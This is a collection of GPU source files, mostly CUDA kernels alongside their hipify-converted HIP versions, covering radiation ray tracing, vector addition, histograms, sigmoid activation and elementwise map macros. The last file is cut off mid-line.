isDbgCellDevice(origin) ) { printf( " ** Switching Levels: prev L: %i, L: %i, cur: [%i,%i,%i], c_old: [%i,%i,%i]\n",prevLev, L, cur.x, cur.y, cur.z, c_old.x, c_old.y, c_old.z); } #endif } //__________________________________ // update marching variables double distanceTraveled = (tMaxV[dir] - old_length); old_length = tMaxV[dir]; tMaxV_prev = tMaxV; tMaxV[dir] = tMaxV[dir] + tDelta[L][dir]; ray_location.x = ray_location.x + ( distanceTraveled * ray_direction.x ); ray_location.y = ray_location.y + ( distanceTraveled * ray_direction.y ); ray_location.z = ray_location.z + ( distanceTraveled * ray_direction.z ); //__________________________________ // when moving to a coarse level tmax will change only in the direction the ray is moving if ( jumpFinetoCoarserLevel || jumpCoarsetoCoarserLevel ){ GPUVector dx = d_levels[L].Dx; double rayDx_Level = ray_location[dir] - ( CC_pos[dir] - 0.5*dx[dir] ); double tMax_tmp = ( sign[dir] * dx[dir] - rayDx_Level ) * inv_ray_direction[dir]; tMaxV = tMaxV_prev; tMaxV[dir] += tMax_tmp; #if DEBUG >0 if( isDbgCellDevice(origin) ) { printf(" Jumping from fine to coarse level: rayDxLevel: %g tmax_tmp: %g dir: %i, CC_pos[dir] %g\n", rayDx_Level, tMax_tmp,dir, CC_pos[dir]); } #endif } // if the cell isn't a flow cell then terminate the ray in_domain = in_domain && (cellType[L][cur] == d_flowCell) ; rayLength += distanceTraveled; optical_thickness += abskg[prevLev][prevCell] * distanceTraveled; double expOpticalThick = exp(-optical_thickness); #if DEBUG == 1 // This sucks --Todd if( isDbgCellDevice(origin) ) { printf( " cur [%d,%d,%d] prev [%d,%d,%d]", cur.x, cur.y, cur.z, prevCell.x, prevCell.y, prevCell.z); printf( " dir %d ", dir ); // printf( " stepSize [%i,%i,%i] ",step[0],step[1],step[2]); printf( "tMaxV [%g,%g,%g] ", tMaxV[0],tMaxV[1], tMaxV[2]); printf( "rayLoc [%4.5f,%4.5f,%4.5f] ",ray_location.x,ray_location.y, ray_location.z); printf( "\tdistanceTraveled %4.5f tMaxV[dir]: %g tMaxV_prev[dir]: %g , Dx[dir]: %g\n",distanceTraveled, tMaxV[dir], tMaxV_prev[dir], d_levels[L].Dx[dir]); printf( " tDelta [%g,%g,%g] \n",tDelta[L].x,tDelta[L].y, tDelta[L].z); // printf( "inv_dir [%g,%g,%g] ",inv_direction.x(),inv_direction.y(), inv_direction.z()); // printf( " abskg[prev] %g \t sigmaT4OverPi[prev]: %g \n",abskg[prevLev][prevCell], sigmaT4OverPi[prevLev][prevCell]); // printf( " abskg[cur] %g \t sigmaT4OverPi[cur]: %g \t cellType: %i \n",abskg[L][cur], sigmaT4OverPi[L][cur], cellType[L][cur]); // printf( " Dx[prevLev].x %g \n", Dx[prevLev].x() ); printf( " optical_thickkness %g \t rayLength: %g \tSumI %g\n", optical_thickness, rayLength, sumI); } #endif sumI += sigmaT4OverPi[prevLev][prevCell] * (expOpticalThick_prev - expOpticalThick) * fs; expOpticalThick_prev = expOpticalThick; } //end domain while loop. ++++++++++++++ //__________________________________ // double wallEmissivity = abskg[L][cur]; if (wallEmissivity > 1.0) { // Ensure wall emissivity doesn't exceed one. wallEmissivity = 1.0; } intensity = exp(-optical_thickness); sumI += wallEmissivity * sigmaT4OverPi[L][cur] * intensity; intensity = intensity * fs; // when a ray reaches the end of the domain, we force it to terminate. if (!RT_flags.allowReflect){ intensity = 0; } #if DEBUG == 1 if( isDbgCellDevice(origin) ) { printf( " C) intensity: %g OptThick: %g, fs: %g allowReflect: %i\n", intensity, optical_thickness, fs, RT_flags.allowReflect ); } #endif //__________________________________ // Reflections if ((intensity > RT_flags.threshold) && RT_flags.allowReflect) { reflect(fs, cur, prevCell, abskg[L][cur], in_domain, step[dir], sign[dir], ray_direction[dir]); ++nReflect; } } // threshold while loop. } // end of updateSumI function //______________________________________________________________________ // Returns random number between 0 & 1.0 including 0 & 1.0 // See src/Core/Math/MersenneTwister.h for equation //______________________________________________________________________ __device__ double randDblDevice(curandState* globalState) { int blockId = blockIdx.x + blockIdx.y * gridDim.x + gridDim.x * gridDim.y * blockIdx.z; int tid = blockId * blockDim.x * blockDim.y * blockDim.z + threadIdx.z * blockDim.y * blockDim.x + threadIdx.y * blockDim.x + threadIdx.x; curandState localState = globalState[tid]; double val = curand(&localState); globalState[tid] = localState; #ifdef FIXED_RANDOM_NUM return 0.3; #else return (double)val * (1.0/4294967295.0); #endif } //______________________________________________________________________ // Returns random number between 0 & 1.0 excluding 0 & 1.0 // See src/Core/Math/MersenneTwister.h for equation //______________________________________________________________________ __device__ double randDblExcDevice(curandState* globalState) { int tid = threadIdx.x + blockDim.x * threadIdx.y + (blockDim.x * blockDim.y) * threadIdx.z; curandState localState = globalState[tid]; double val = curand(&localState); globalState[tid] = localState; #ifdef FIXED_RANDOM_NUM return 0.3; #else return ( (double)val + 0.5 ) * (1.0/4294967296.0); #endif } //______________________________________________________________________ // Returns random integer in [0,n] // rnd_integer_from_A_to_B = A + curand() * (B-A); // A = 0 //______________________________________________________________________ __device__ int randIntDevice(curandState* globalState, const int B ) { double val = randDblDevice( globalState ); return val * B; } //______________________________________________________________________ // Each thread gets same seed, a different sequence number, no offset // This will create repeatable results. __device__ void setupRandNumsSeedAndSequences(curandState* randNumStates, int numStates, unsigned long long patchID, unsigned long long curTimeStep) { // Generate random numbers using curand_init(). // Format is curand_init(seed, sequence, offset, state); // Note, it seems a very large sequence really slows things down (bits in the high order region) // I measured kernels taking an additional 300 milliseconds due to it! So the sequence is kept // small, using lower order bits only, and intead the seed is given a number with bits in both the // high order and low order regions. // Unfortunately this isn't perfect. "Sequences generated with different seeds // usually do not have statistically correlated values, but some choices of seeds may give // statistically correlated sequences. Sequences generated with the same seed and different // sequence numbers will not have statistically correlated values." from here: // http://docs.nvidia.com/cuda/curand/device-api-overview.html#axzz4SPy8xMuj // For RMCRT we will take the tradeoff of possibly having statistically correlated values over // the 300 millisecond hit. // Generate what should be a unique seed. To get a unique number the code below computes a tID // which is a combination of a patchID, threadID, and the current timestep. // This uses the left 20 bits from the patchID, the next 20 bits from the curTimeStep // and the last 24 bits from the indexId. Combined that should be unique. //Standard CUDA way of computing a threadID int blockId = blockIdx.x + blockIdx.y * gridDim.x + gridDim.x * gridDim.y * blockIdx.z; int threadId = blockId * blockDim.x * blockDim.y * blockDim.z + threadIdx.z * blockDim.y * blockDim.x + threadIdx.y * blockDim.x + threadIdx.x; unsigned long long tID = (((patchID & 0xFFFFF) << 44) | ((curTimeStep& 0xFFFFF) << 24) | (threadId & 0xFFFFFF)); curand_init(tID, threadId, 0, &randNumStates[threadId]); //If you want to take the 300 millisecond hit, use this line below instead. //curand_init(1234, tID, 0, &randNumStates[threadId]); } //______________________________________________________________________ // is cell a debug cell __device__ bool isDbgCellDevice( GPUIntVector me ) { int size = 2; GPUIntVector dbgCell[2]; dbgCell[0] = make_int3(0,0,0); dbgCell[1] = make_int3(5,5,5); for (int i = 0; i < size; i++) { if( me == dbgCell[i]){ return true; } } return false; } //______________________________________________________________________ // //Math.h has an std::isnan and std::isinf. CUDA has an isnan and isinf macro (not in a namespace, and not a function) //This .cu file sees both, so trying to use the CUDA isnan gives compiler ambiguity errors. //Dan Sutherland with Sandia said they solved this problem by using their own isnan and isinf //So here is the code for that. They're also renamed to isNan and isInf to keep things separate. //(Code was found at http://stackoverflow.com/questions/2249110/how-do-i-make-a-portable-isnan-isinf-function //and adapted from https://github.com/Itseez/opencv/blob/3.0.0/modules/hal/include/opencv2/hal/defs.h#L447 ) typedef unsigned long long uint64; __device__ int isInf(double x) { union { uint64 u; double f; } ieee754; ieee754.f = x; return ( (unsigned)(ieee754.u >> 32) & 0x7fffffff ) == 0x7ff00000 && ( (unsigned)ieee754.u == 0 ); } __device__ int isNan(double x) { union { uint64 u; double f; } ieee754; ieee754.f = x; return ( (unsigned)(ieee754.u >> 32) & 0x7fffffff ) + ( (unsigned)ieee754.u != 0 ) > 0x7ff00000; } __device__ int isInf( float value ) { union { uint64 u; double f; } ieee754; ieee754.f = value; return (ieee754.u & 0x7fffffff) == 0x7f800000; } __device__ int isNan( float value ) { union { uint64 u; double f; } ieee754; ieee754.f = value; return (ieee754.u & 0x7fffffff) > 0x7f800000; } //______________________________________________________________________ // Perform some sanity checks on the Variable. This is for debugging template< class T> __device__ void GPUVariableSanityCK(const GPUGridVariable<T>& Q, const GPUIntVector Lo, const GPUIntVector Hi) { #if SCI_ASSERTION_LEVEL > 0 if (isThread0()) { GPUIntVector varLo = Q.getLowIndex(); GPUIntVector varHi = Q.getHighIndex(); if( Lo < varLo || varHi < Hi){ printf ( "ERROR: GPUVariableSanityCK \n"); printf(" Variable: varLo:[%i,%i,%i], varHi[%i,%i,%i]\n", varLo.x, varLo.y, varLo.z, varHi.x, varHi.y, varHi.z); printf(" Requested extents: varLo:[%i,%i,%i], varHi[%i,%i,%i]\n", Lo.x, Lo.y, Lo.z, Hi.x, Hi.y, Hi.z); printf(" Now existing..."); __threadfence(); asm("trap;"); } for (int i = Lo.x; i < Hi.x; i++) { for (int j = Lo.y; j < Hi.y; j++) { for (int k = Lo.z; k < Hi.z; k++) { GPUIntVector idx = make_int3(i, j, k); T me = Q[idx]; if ( isNan(me) || isInf(me)){ printf ( "isNan or isInf was detected at [%i,%i,%i]\n", i,j,k); printf(" Now existing..."); __threadfence(); asm("trap;"); } } // k loop } // j loop } // i loop } // thread0 #endif } template __device__ void GPUVariableSanityCK(const GPUGridVariable<float>& Q, const GPUIntVector Lo, const GPUIntVector Hi); template __device__ void GPUVariableSanityCK(const GPUGridVariable<double>& Q, const GPUIntVector Lo, const GPUIntVector Hi); //______________________________________________________________________ // template< class T> __host__ void launchRayTraceKernel(DetailedTask* dtask, dim3 dimGrid, dim3 dimBlock, const int matlIndx, levelParams level, patchParams patch, cudaStream_t* stream, RMCRT_flags RT_flags, int curTimeStep, GPUDataWarehouse* abskg_gdw, GPUDataWarehouse* sigmaT4_gdw, GPUDataWarehouse* cellType_gdw, GPUDataWarehouse* old_gdw, GPUDataWarehouse* new_gdw) { // setup random number generator states on the device, 1 for each thread curandState* randNumStates; int numStates = dimGrid.x * dimGrid.y * dimGrid.z * dimBlock.x * dimBlock.y * dimBlock.z; randNumStates = (curandState*)GPUMemoryPool::allocateCudaSpaceFromPool(0, numStates * sizeof(curandState)); dtask->addTempCudaMemoryToBeFreedOnCompletion(0, randNumStates); //Create a host array, load it with data, and send it over to the GPU int nRandNums = 512; double* d_debugRandNums; size_t randNumsByteSize = nRandNums * sizeof(double); d_debugRandNums = (double*)GPUMemoryPool::allocateCudaSpaceFromPool(0, randNumsByteSize); dtask->addTempCudaMemoryToBeFreedOnCompletion(0, d_debugRandNums); //Making sure we have kernel/mem copy overlapping double* h_debugRandNums = new double[nRandNums]; cudaHostRegister(h_debugRandNums, randNumsByteSize, cudaHostRegisterPortable); //perform computations here on h_debugRandNums for (int i = 0; i < nRandNums; i++) { h_debugRandNums[i] = i; } dtask->addTempHostMemoryToBeFreedOnCompletion(h_debugRandNums); cudaMemcpyAsync(d_debugRandNums, h_debugRandNums, randNumsByteSize, cudaMemcpyHostToDevice, *stream ); rayTraceKernel< T ><<< dimGrid, dimBlock, 0, *stream >>>( dimGrid, dimBlock, matlIndx, level, patch, randNumStates, RT_flags, curTimeStep, abskg_gdw, sigmaT4_gdw, cellType_gdw, old_gdw, new_gdw); #if DEBUG > 0 cudaDeviceSynchronize(); // so printF will work #endif } //______________________________________________________________________ // template< class T> __host__ void launchRayTraceDataOnionKernel( DetailedTask* dtask, dim3 dimGrid, dim3 dimBlock, int matlIndex, patchParams patch, gridParams gridP, levelParams* levelP, GPUIntVector fineLevel_ROI_Lo, GPUIntVector fineLevel_ROI_Hi, cudaStream_t* stream, RMCRT_flags RT_flags, int curTimeStep, GPUDataWarehouse* abskg_gdw, GPUDataWarehouse* sigmaT4_gdw, GPUDataWarehouse* cellType_gdw, GPUDataWarehouse* old_gdw, GPUDataWarehouse* new_gdw ) { // copy regionLo & regionHi to device memory int maxLevels = gridP.maxLevels; int3* dev_regionLo; int3* dev_regionHi; size_t size = d_MAXLEVELS * sizeof(int3); dev_regionLo = (int3*)GPUMemoryPool::allocateCudaSpaceFromPool(0, size); dev_regionHi = (int3*)GPUMemoryPool::allocateCudaSpaceFromPool(0, size); dtask->addTempCudaMemoryToBeFreedOnCompletion(0, dev_regionLo); dtask->addTempCudaMemoryToBeFreedOnCompletion(0, dev_regionHi); //More GPU stuff to allow kernel/copy overlapping int3 * myLo = new int3[d_MAXLEVELS]; cudaHostRegister(myLo, sizeof(int3) * d_MAXLEVELS, cudaHostRegisterPortable); int3 * myHi = new int3[d_MAXLEVELS]; cudaHostRegister(myHi, sizeof(int3) * d_MAXLEVELS, cudaHostRegisterPortable); dtask->addTempHostMemoryToBeFreedOnCompletion(myLo); dtask->addTempHostMemoryToBeFreedOnCompletion(myHi); for (int l = 0; l < maxLevels; ++l) { myLo[l] = levelP[l].regionLo; // never use levelP regionLo or hi in the kernel. myHi[l] = levelP[l].regionHi; // They are different on each patch } CUDA_RT_SAFE_CALL( cudaMemcpyAsync( dev_regionLo, myLo, size, cudaMemcpyHostToDevice, *stream) ); CUDA_RT_SAFE_CALL( cudaMemcpyAsync( dev_regionHi, myHi, size, cudaMemcpyHostToDevice, *stream) ); //__________________________________ // copy levelParams array to constant memory on device CUDA_RT_SAFE_CALL(cudaMemcpyToSymbolAsync(d_levels, levelP, (maxLevels * sizeof(levelParams)),0, cudaMemcpyHostToDevice,*stream)); //__________________________________ // setup random number generator states on the device, 1 for each thread int numStates = dimGrid.x * dimGrid.y * dimGrid.z * dimBlock.x * dimBlock.y * dimBlock.z; curandState* randNumStates; randNumStates = (curandState*)GPUMemoryPool::allocateCudaSpaceFromPool(0, numStates * sizeof(curandState)); dtask->addTempCudaMemoryToBeFreedOnCompletion(0, randNumStates); rayTraceDataOnionKernel< T ><<< dimGrid, dimBlock, 0, *stream >>>( dimGrid, dimBlock, matlIndex, patch, gridP, fineLevel_ROI_Lo, fineLevel_ROI_Hi, dev_regionLo, dev_regionHi, randNumStates, RT_flags, curTimeStep, abskg_gdw, sigmaT4_gdw, cellType_gdw, old_gdw, new_gdw); //cudaDeviceSynchronize(); //cudaError_t result = cudaPeekAtLastError(); //printf("After the error code for patch %d was %d\n", patch.ID, result); #if DEBUG > 0 cudaDeviceSynchronize(); #endif } //______________________________________________________________________ // Explicit template instantiations template __host__ void launchRayTraceKernel<double>( DetailedTask* dtask, dim3 dimGrid, dim3 dimBlock, const int matlIndx, levelParams level, patchParams patch, cudaStream_t* stream, RMCRT_flags RT_flags, int curTimeStep, GPUDataWarehouse* abskg_gdw, GPUDataWarehouse* sigmaT4_gdw, GPUDataWarehouse* cellType_gdw, GPUDataWarehouse* old_gdw, GPUDataWarehouse* new_gdw ); //______________________________________________________________________ // template __host__ void launchRayTraceKernel<float>( DetailedTask* dtask, dim3 dimGrid, dim3 dimBlock, const int matlIndx, levelParams level, patchParams patch, cudaStream_t* stream, RMCRT_flags RT_flags, int curTimeStep, GPUDataWarehouse* abskg_gdw, GPUDataWarehouse* sigmaT4_gdw, GPUDataWarehouse* celltype_gdw, GPUDataWarehouse* old_gdw, GPUDataWarehouse* new_gdw ); //______________________________________________________________________ // template __host__ void launchRayTraceDataOnionKernel<double>( DetailedTask* dtask, dim3 dimGrid, dim3 dimBlock, int matlIndex, patchParams patch, gridParams gridP, levelParams* levelP, GPUIntVector fineLevel_ROI_Lo, GPUIntVector fineLevel_ROI_Hi, cudaStream_t* stream, RMCRT_flags RT_flags, int curTimeStep, GPUDataWarehouse* abskg_gdw, GPUDataWarehouse* sigmaT4_gdw, GPUDataWarehouse* cellType_gdw, GPUDataWarehouse* old_gdw, GPUDataWarehouse* new_gdw ); //______________________________________________________________________ // template __host__ void launchRayTraceDataOnionKernel<float>( DetailedTask* dtask, dim3 dimGrid, dim3 dimBlock, int matlIndex, patchParams patch, gridParams gridP, levelParams* levelP, GPUIntVector fineLevel_ROI_Lo, GPUIntVector fineLevel_ROI_Hi, cudaStream_t* stream, RMCRT_flags RT_flags, int curTimeStep, GPUDataWarehouse* abskg_gdw, GPUDataWarehouse* sigmaT4_gdw, GPUDataWarehouse* cellType_gdw, GPUDataWarehouse* old_gdw, GPUDataWarehouse* new_gdw ); } //end namespace Uintah
bebdcc9057721fdb0efe24617096b587619d968c.hip
// !!! This is a file automatically generated by hipify!!! #include <stdio.h> #include <hip/hip_runtime.h> int *a, *b; // host data int *c, *c2; // results //Cuda error checking - non mandatory void cudaCheckError() { hipError_t e=hipGetLastError(); if(e!=hipSuccess) { printf("Cuda failure %s:%d: '%s'\n",__FILE__,__LINE__,hipGetErrorString(e)); exit(0); } } //GPU kernel __global__ void vecAdd(int *A,int *B,int *C,int N){ int i = blockIdx.x * blockDim.x + threadIdx.x; C[i] = A[i] + B[i]; } //CPU function void vecAdd_h(int *A1,int *B1, int *C1, int N){ for(int i = 0; i < N; i++) C1[i] = A1[i] + B1[i]; } int main(int argc,char **argv) { printf("Begin \n"); //Iterations int n=10000000; //Number of blocks int nBytes = n*sizeof(int); //Block size and number int block_size, block_no; //memory allocation a = (int *) malloc(nBytes); b = (int *) malloc(nBytes); c = (int *) malloc(nBytes); c2 = (int *) malloc(nBytes); int *a_d,*b_d,*c_d; block_size = 250; //threads per block block_no = n/block_size; //Work definition dim3 dimBlock(block_size, 1, 1); dim3 dimGrid(block_no, 1, 1); // Data filling for(int i=0;i<n;i++) a[i]=i,b[i]=i; printf("Allocating device memory on host..\n"); //GPU memory allocation hipMalloc((void **) &a_d, n*sizeof(int)); hipMalloc((void **) &b_d, n*sizeof(int)); hipMalloc((void **) &c_d, n*sizeof(int)); printf("Copying to device..\n"); hipMemcpy(a_d, a, n*sizeof(int), hipMemcpyHostToDevice); hipMemcpy(b_d, b, n*sizeof(int), hipMemcpyHostToDevice); clock_t start_d=clock(); printf("Doing GPU Vector add\n"); hipLaunchKernelGGL(( vecAdd), dim3(block_no),dim3(block_size), 0, 0, a_d, b_d, c_d, n); cudaCheckError(); //Wait for kernel call to finish hipDeviceSynchronize(); clock_t end_d = clock(); printf("Doing CPU Vector add\n"); clock_t start_h = clock(); vecAdd_h(a, b, c2, n); clock_t end_h = clock(); //Time computing double time_d = (double)(end_d-start_d)/CLOCKS_PER_SEC; double time_h = (double)(end_h-start_h)/CLOCKS_PER_SEC; //Copying data back to host, this is a blocking call and will not start until all kernels are finished hipMemcpy(c, c_d, n*sizeof(int), hipMemcpyDeviceToHost); printf("n = %d \t GPU time = %fs \t CPU time = %fs\n", n, time_d, time_h); //Free GPU memory hipFree(a_d); hipFree(b_d); hipFree(c_d); return 0; }
bebdcc9057721fdb0efe24617096b587619d968c.cu
#include <stdio.h> #include <cuda.h> int *a, *b; // host data int *c, *c2; // results //Cuda error checking - non mandatory void cudaCheckError() { cudaError_t e=cudaGetLastError(); if(e!=cudaSuccess) { printf("Cuda failure %s:%d: '%s'\n",__FILE__,__LINE__,cudaGetErrorString(e)); exit(0); } } //GPU kernel __global__ void vecAdd(int *A,int *B,int *C,int N){ int i = blockIdx.x * blockDim.x + threadIdx.x; C[i] = A[i] + B[i]; } //CPU function void vecAdd_h(int *A1,int *B1, int *C1, int N){ for(int i = 0; i < N; i++) C1[i] = A1[i] + B1[i]; } int main(int argc,char **argv) { printf("Begin \n"); //Iterations int n=10000000; //Number of blocks int nBytes = n*sizeof(int); //Block size and number int block_size, block_no; //memory allocation a = (int *) malloc(nBytes); b = (int *) malloc(nBytes); c = (int *) malloc(nBytes); c2 = (int *) malloc(nBytes); int *a_d,*b_d,*c_d; block_size = 250; //threads per block block_no = n/block_size; //Work definition dim3 dimBlock(block_size, 1, 1); dim3 dimGrid(block_no, 1, 1); // Data filling for(int i=0;i<n;i++) a[i]=i,b[i]=i; printf("Allocating device memory on host..\n"); //GPU memory allocation cudaMalloc((void **) &a_d, n*sizeof(int)); cudaMalloc((void **) &b_d, n*sizeof(int)); cudaMalloc((void **) &c_d, n*sizeof(int)); printf("Copying to device..\n"); cudaMemcpy(a_d, a, n*sizeof(int), cudaMemcpyHostToDevice); cudaMemcpy(b_d, b, n*sizeof(int), cudaMemcpyHostToDevice); clock_t start_d=clock(); printf("Doing GPU Vector add\n"); vecAdd<<<block_no,block_size>>>(a_d, b_d, c_d, n); cudaCheckError(); //Wait for kernel call to finish cudaThreadSynchronize(); clock_t end_d = clock(); printf("Doing CPU Vector add\n"); clock_t start_h = clock(); vecAdd_h(a, b, c2, n); clock_t end_h = clock(); //Time computing double time_d = (double)(end_d-start_d)/CLOCKS_PER_SEC; double time_h = (double)(end_h-start_h)/CLOCKS_PER_SEC; //Copying data back to host, this is a blocking call and will not start until all kernels are finished cudaMemcpy(c, c_d, n*sizeof(int), cudaMemcpyDeviceToHost); printf("n = %d \t GPU time = %fs \t CPU time = %fs\n", n, time_d, time_h); //Free GPU memory cudaFree(a_d); cudaFree(b_d); cudaFree(c_d); return 0; }
4de61da26c26e68fb11975d6edbf4c469997baad.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" /****************************************************************************** *cr *cr (C) Copyright 2010 The Board of Trustees of the *cr University of Illinois *cr All Rights Reserved *cr ******************************************************************************/ // Define your kernels in this file you may use more than one kernel if you // need to // INSERT KERNEL(S) HERE __global__ void myHisto(unsigned int* input, unsigned int* bins, unsigned int num_elements, unsigned int num_bins) { __shared__ unsigned int binL[4096]; // support num bins no more than 4096 int step = 0; while (step < num_bins) { if (step + threadIdx.x < num_bins) binL[step + threadIdx.x] = 0; step += blockDim.x; } __syncthreads(); int i = threadIdx.x + blockIdx.x * blockDim.x; int stride = blockDim.x * gridDim.x; while (i < num_elements) { atomicAdd(&binL[input[i]], 1); i += stride; } __syncthreads(); step = 0; while (step < num_bins) { if (step + threadIdx.x < num_bins) atomicAdd(&bins[step + threadIdx.x], binL[step + threadIdx.x]); step += blockDim.x; } } /****************************************************************************** Setup and invoke your kernel(s) in this function. You may also allocate more GPU memory if you need to *******************************************************************************/ void histogram(unsigned int* input, unsigned int* bins, unsigned int num_elements, unsigned int num_bins) { // Criteria for choosing gird size and block size // 1. shared memory size. 4k unsigned int use 16kB memory // 2. efficiency. If each block creates its own local bin, there will be #blocks * size_of_bins writes to global bin // Thus, the numbers a block deals must be levels larger than the size of bins. // INSERT CODE HERE int grids = sqrt(num_elements) / 64 + 1; dim3 dimGrid(grids, 1, 1); dim3 dimBlock(512, 1, 1); hipLaunchKernelGGL(( myHisto) , dim3(dimGrid), dim3(dimBlock), 0, 0, input, bins, num_elements, num_bins); }
4de61da26c26e68fb11975d6edbf4c469997baad.cu
/****************************************************************************** *cr *cr (C) Copyright 2010 The Board of Trustees of the *cr University of Illinois *cr All Rights Reserved *cr ******************************************************************************/ // Define your kernels in this file you may use more than one kernel if you // need to // INSERT KERNEL(S) HERE __global__ void myHisto(unsigned int* input, unsigned int* bins, unsigned int num_elements, unsigned int num_bins) { __shared__ unsigned int binL[4096]; // support num bins no more than 4096 int step = 0; while (step < num_bins) { if (step + threadIdx.x < num_bins) binL[step + threadIdx.x] = 0; step += blockDim.x; } __syncthreads(); int i = threadIdx.x + blockIdx.x * blockDim.x; int stride = blockDim.x * gridDim.x; while (i < num_elements) { atomicAdd(&binL[input[i]], 1); i += stride; } __syncthreads(); step = 0; while (step < num_bins) { if (step + threadIdx.x < num_bins) atomicAdd(&bins[step + threadIdx.x], binL[step + threadIdx.x]); step += blockDim.x; } } /****************************************************************************** Setup and invoke your kernel(s) in this function. You may also allocate more GPU memory if you need to *******************************************************************************/ void histogram(unsigned int* input, unsigned int* bins, unsigned int num_elements, unsigned int num_bins) { // Criteria for choosing gird size and block size // 1. shared memory size. 4k unsigned int use 16kB memory // 2. efficiency. If each block creates its own local bin, there will be #blocks * size_of_bins writes to global bin // Thus, the numbers a block deals must be levels larger than the size of bins. // INSERT CODE HERE int grids = sqrt(num_elements) / 64 + 1; dim3 dimGrid(grids, 1, 1); dim3 dimBlock(512, 1, 1); myHisto <<<dimGrid, dimBlock>>> (input, bins, num_elements, num_bins); }
c4e495af5bff79b52784ba2c0e3f444bcac5ab87.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" template<typename Destination, typename Data> __global__ void sigmoidActivationForward(size_t elements, Destination *dst, Data *src) { const size_t kernelIndex = blockDim.x * blockIdx.x + threadIdx.x; if (kernelIndex < elements) { dst[kernelIndex] = 1 / (1 + exp((float)-src[kernelIndex])); } } template<> __global__ void sigmoidActivationForward(size_t elements, float *dst, float *src) { const size_t kernelIndex = blockDim.x * blockIdx.x + threadIdx.x; if (kernelIndex < elements) { dst[kernelIndex] = 1 / (1 + exp(-src[kernelIndex])); } } template<> __global__ void sigmoidActivationForward(size_t elements, double *dst, double *src) { const size_t kernelIndex = blockDim.x * blockIdx.x + threadIdx.x; if (kernelIndex < elements) { dst[kernelIndex] = 1 / (1 + exp(-src[kernelIndex])); } } template<typename Destination, typename Data> __global__ void sigmoidActivationBackward(size_t elements, Destination *dst, Data *src) { const size_t kernelIndex = blockDim.x * blockIdx.x + threadIdx.x; if (kernelIndex < elements) { dst[kernelIndex] = src[kernelIndex] * (1 - src[kernelIndex]); } }
c4e495af5bff79b52784ba2c0e3f444bcac5ab87.cu
template<typename Destination, typename Data> __global__ void sigmoidActivationForward(size_t elements, Destination *dst, Data *src) { const size_t kernelIndex = blockDim.x * blockIdx.x + threadIdx.x; if (kernelIndex < elements) { dst[kernelIndex] = 1 / (1 + exp((float)-src[kernelIndex])); } } template<> __global__ void sigmoidActivationForward(size_t elements, float *dst, float *src) { const size_t kernelIndex = blockDim.x * blockIdx.x + threadIdx.x; if (kernelIndex < elements) { dst[kernelIndex] = 1 / (1 + exp(-src[kernelIndex])); } } template<> __global__ void sigmoidActivationForward(size_t elements, double *dst, double *src) { const size_t kernelIndex = blockDim.x * blockIdx.x + threadIdx.x; if (kernelIndex < elements) { dst[kernelIndex] = 1 / (1 + exp(-src[kernelIndex])); } } template<typename Destination, typename Data> __global__ void sigmoidActivationBackward(size_t elements, Destination *dst, Data *src) { const size_t kernelIndex = blockDim.x * blockIdx.x + threadIdx.x; if (kernelIndex < elements) { dst[kernelIndex] = src[kernelIndex] * (1 - src[kernelIndex]); } }
efe1adcbdf7e31857da1884ba3e9953dca96eaad.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include <stdio.h> #define MAKE_NAME(prefix, fun, T) prefix ## _ ## fun ## _ ## T #define MAP_FUN_1(fun, T) \ extern "C" \ __global__ void MAKE_NAME(map, fun, T) (int rows, int cols,\ T *out, int outMajorStride,\ const T *in, int inMajorStride) {\ for(int col = threadIdx.x + blockIdx.x * blockDim.x; col < cols; col += blockDim.x * gridDim.x) {\ for(int row = threadIdx.y + blockIdx.y * blockDim.y; row < rows; row += blockDim.y * gridDim.y) {\ out[col * outMajorStride + row] = fun(in[col * inMajorStride + row]);\ }\ }\ } #define MAP_BLOCK_SIZE 32 #define MAP_FUN_2(fun, T) \ extern "C" \ __global__ void MAKE_NAME(map2, fun, T) (int rows, int cols,\ T *out, int outMajorStride,\ const T *a, int aMajorStride,\ const T *b, int bMajorStride) {\ for(int col = threadIdx.x + blockIdx.x * blockDim.x; col < cols; col += blockDim.x * gridDim.x) {\ for(int row = threadIdx.y + blockIdx.y * blockDim.y; row < rows; row += blockDim.y * gridDim.y) {\ out[col * outMajorStride + row] = fun(a[col * aMajorStride + row], b[col * bMajorStride + row]);\ }\ }\ }\ \ extern "C" \ __global__ void MAKE_NAME(map2_v_s, fun, T) (int rows, int cols,\ T *out, int outMajorStride,\ const T *a, int aMajorStride,\ const T b) {\ for(int col = threadIdx.x + blockIdx.x * blockDim.x; col < cols; col += blockDim.x * gridDim.x) {\ for(int row = threadIdx.y + blockIdx.y * blockDim.y; row < rows; row += blockDim.y * gridDim.y) {\ out[col * outMajorStride + row] = fun(a[col * aMajorStride + row], b);\ }\ }\ }\ \ extern "C" \ __global__ void MAKE_NAME(map2_s_v, fun, T) (int rows, int cols,\ T *out, int outMajorStride,\ const T a,\ const T *b, int bMajorStride) {\ for(int col = threadIdx.x + blockIdx.x * blockDim.x; col < cols; col += blockDim.x * gridDim.x) {\ for(int row = threadIdx.y + blockIdx.y * blockDim.y; row < rows; row += blockDim.y * gridDim.y) {\ out[col * outMajorStride + row] = fun(a, b[col * bMajorStride + row]);\ }\ }\ }\ extern "C" \ __global__ void MAKE_NAME(map2_transpose, fun, T) (int rows, int cols,\ T *out, int outMajorStride,\ const T *a, int aMajorStride,\ const T *b, int bMajorStride) {\ \ int numGroupsX = blockDim.x * gridDim.x;\ int numGroupsY = blockDim.y * gridDim.y;\ int firstBlockX = blockDim.x * blockIdx.x;\ int firstBlockY = blockDim.y * blockIdx.y;\ __shared__ T tile[MAP_BLOCK_SIZE][MAP_BLOCK_SIZE+1];\ \ /*x is row in a, col in b*/\ /*y is col in a, row in b*/\ \ for (int yb = firstBlockY; yb < cols; yb += numGroupsY) {\ for (int xb = firstBlockX; xb < rows; xb += numGroupsX) {\ int ylim = min(cols, yb + MAP_BLOCK_SIZE);\ int xlim = min(rows, xb + MAP_BLOCK_SIZE);\ \ \ /* use threadid.y for x here so that the y loop is on the first blockDim, which means coalesced reads*/\ for (int x = threadIdx.y + xb; x < xlim; x += blockDim.y) {\ for(int y = threadIdx.x + yb; y < ylim; y += blockDim.x) {\ tile[x-xb][y-yb] = b[x*bMajorStride + y];\ }\ }\ \ __syncthreads();\ for(int y = threadIdx.y + yb; y < ylim; y += blockDim.y) {\ for (int x = threadIdx.x + xb; x < xlim; x += blockDim.x) {\ out[x + y*outMajorStride] = fun(a[x + y * aMajorStride], 